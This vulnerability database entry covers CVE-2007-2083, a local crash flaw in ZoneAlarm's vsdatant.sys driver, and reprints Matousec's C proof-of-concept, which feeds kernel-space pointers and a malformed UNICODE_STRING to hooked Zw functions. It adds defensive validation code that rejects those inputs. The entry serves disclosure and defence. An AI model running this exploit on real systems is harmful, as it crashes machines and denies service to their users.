ZoneAlarm Hooked SSDT Functions Multiple Input Validation Local Denial of Service Vulnerability

Vulnerability ID: 1112712  Vulnerability type: Other
Published: 2007-04-15  Updated: 2007-09-18
CVE ID: CVE-2007-2083  CNNVD ID: CNNVD-200704-307
Platform: Windows  CVSS score: 6.9
|Sources
https://www.exploit-db.com/exploits/29860
https://www.securityfocus.com/bid/23494
https://cxsecurity.com/issue/WLB-2007040098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-307
|Details
ZoneAlarm is a personal firewall that protects personal data and privacy. Two user-mode argument validation errors exist in the SSDT functions that ZoneAlarm hooks. Because of a flaw in the vsdatant.sys driver, a local user who calls NtCreateKey or NtDeleteFile with invalid argument values can crash the system.
|Exploit
source: http://www.securityfocus.com/bid/23494/info

ZoneAlarm is prone to a local denial-of-service vulnerability.

This issue occurs when attackers supply invalid argument values to the 'vsdatant.sys' driver.

A local attacker may exploit this issue to crash affected computers, denying service to legitimate users.

ZoneAlarm Pro 6.5.737.000 and 6.1.744.001 are prone to this issue; other versions may be affected as well. 

/*

 Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00001P000ZA)
 

 Usage:
 prog FUNCNAME
   FUNCNAME - name of function to be checked

 Description:
 This program calls given function with parameters that cause the crash of the system. This happens because of 
 insufficient check of function arguments in the driver of the firewall.

 Test:
 Running the testing program with a name of a vulnerable function.

*/

#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

void about(void)
{
  printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00001P000ZA)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test FUNCNAME\n"
         "  FUNCNAME - name of function to be checked\n");
  return;
}



int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);

    /* ObjectName is made to point into kernel address space (0x80000000 and
       up) and is advanced on every call; the driver's hook does not validate
       the pointer before using it. */
    for (oa.ObjectName=(PVOID)0x80000000;;oa.ObjectName+=0x0300)
      ZwCreateKey(&handle,0,&oa,0,NULL,0,NULL);

  } else if (!stricmp(argv[1],"NtDeleteFile") || !stricmp(argv[1],"ZwDeleteFile"))
  {
    OBJECT_ATTRIBUTES oa;
    /* Malformed UNICODE_STRING: Length (0x6B3) exceeds MaximumLength (0x12)
       and Buffer is an arbitrary low address (0x10000). */
    UNICODE_STRING us={0x6B3,0x12,(PVOID)0x10000};
    InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
    ZwDeleteFile(&oa);
  } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

  printf("\nTEST FAILED!\n");
  return 1;
}
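The checks a driver that hooks NtCreateKey/NtDeleteFile should apply to user-supplied OBJECT_ATTRIBUTES before dereferencing them, run against the two malformed inputs the PoC above builds. This is an added example, not the advisory's or Matousec's code, and it is a portable mock-up: the structures mirror the 32-bit Windows layouts, while MM_USER_PROBE_ADDRESS, USER_PAGE_VA and the single mapped user page are assumptions standing in for ProbeForRead and the page-fault handler.

```c
#include <stdint.h>
#include <string.h>
/* 32-bit x86 split assumed, as in the PoC: valid user VAs lie below 0x80000000. */
#define MM_USER_PROBE_ADDRESS 0x80000000u
enum { CHECK_OK = 0, CHECK_BAD_POINTER, CHECK_BAD_ALIGN, CHECK_BAD_LENGTH };
/* 32-bit mirrors of UNICODE_STRING / OBJECT_ATTRIBUTES; pointer fields hold user VAs. */
typedef struct { uint16_t Length, MaximumLength; uint32_t Buffer; } USTR32;
typedef struct { uint32_t Length, RootDirectory, ObjectName, Attributes, SD, SQOS; } OA32;
/* Constructed user address space: one mapped page; any other user VA "faults". */
#define USER_PAGE_VA 0x00400000u
static uint8_t user_page[0x1000];
static uint32_t place(uint32_t va, const void *src, uint32_t n) {
    memcpy(user_page + (va - USER_PAGE_VA), src, n); return va;
}
/* ProbeForRead semantics plus a guarded copy into kernel-owned storage: later checks
   run on the captured copy, so user mode cannot race the validation (TOCTOU). */
static int capture_user(uint32_t va, uint32_t size, uint32_t align, void *dst) {
    if (va == 0 || va >= MM_USER_PROBE_ADDRESS || size > MM_USER_PROBE_ADDRESS - va)
        return CHECK_BAD_POINTER;  /* NULL, kernel address, or range wrapping into kernel */
    if (va % align) return CHECK_BAD_ALIGN;
    if (va < USER_PAGE_VA || va - USER_PAGE_VA + size > sizeof user_page)
        return CHECK_BAD_POINTER;  /* unmapped page: the fault __try/__except would catch */
    memcpy(dst, user_page + (va - USER_PAGE_VA), size);
    return CHECK_OK;
}
/* Checks a hooking driver must make on a user UNICODE_STRING before touching Buffer. */
static int check_unicode_string(uint32_t us_va) {
    USTR32 us; uint16_t name[256]; int rc = capture_user(us_va, sizeof us, 4, &us); if (rc) return rc;
    if (us.Length > us.MaximumLength || (us.Length & 1) || us.Length > sizeof name)
        return CHECK_BAD_LENGTH;   /* catches the PoC's Length 0x6B3 > MaximumLength 0x12 */
    return us.Length ? capture_user(us.Buffer, us.Length, 2, name) : CHECK_OK;
}
/* Same for OBJECT_ATTRIBUTES: a NULL ObjectName is legitimate, a kernel-space one is not. */
static int check_object_attributes(uint32_t oa_va) {
    OA32 oa; int rc = capture_user(oa_va, sizeof oa, 4, &oa); if (rc) return rc;
    if (oa.Length != sizeof oa) return CHECK_BAD_LENGTH;
    return oa.ObjectName ? check_unicode_string(oa.ObjectName) : CHECK_OK;
}
/* Scenarios: build OBJECT_ATTRIBUTES in the fake user page and validate them. */
static int try_oa(uint32_t object_name_va) {
    OA32 oa = { sizeof oa, 0, object_name_va, 0, 0, 0 };
    return check_object_attributes(place(USER_PAGE_VA, &oa, sizeof oa));
}
int poc_createkey(void)  { return try_oa(0x80000000u); }  /* first ObjectName in the PoC loop */
int poc_deletefile(void) { /* the PoC's UNICODE_STRING {0x6B3, 0x12, 0x10000} */
    USTR32 us = { 0x6B3, 0x12, 0x10000 }; return try_oa(place(USER_PAGE_VA + 0x100, &us, sizeof us));
}
int well_formed(void) {  /* L"key": Length 6 == MaximumLength, buffer mapped and 2-byte aligned */
    uint16_t name[3] = { 'k', 'e', 'y' }; USTR32 us = { 6, 6, place(USER_PAGE_VA + 0x200, name, 6) };
    return try_oa(place(USER_PAGE_VA + 0x100, &us, sizeof us));
}
```

Both PoC inputs are rejected before any dereference (the kernel-space ObjectName by the range check, the oversized Length by the length check), while the well-formed name passes.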
|Affected products
Zone Labs ZoneAlarm Pro 6.5.737.000; Zone Labs ZoneAlarm Pro 6.1.744.001
|References

Source: BUGTRAQ
Name: 20070415 ZoneAlarm Multiple insufficient argument validation of hooked SSDT function Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/465868/100/0/threaded
Source: MISC
Link: http://www.matousec.com/info/advisories/ZoneAlarm-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php
Source: XF
Name: zonealarm-vsdatant-dos(33664)
Link: http://xforce.iss.net/xforce/xfdb/33664
Source: OSVDB
Name: 35239
Link: http://osvdb.org/35239
Source: SREASON
Name: 2591
Link: http://securityreason.com/securityalert/2591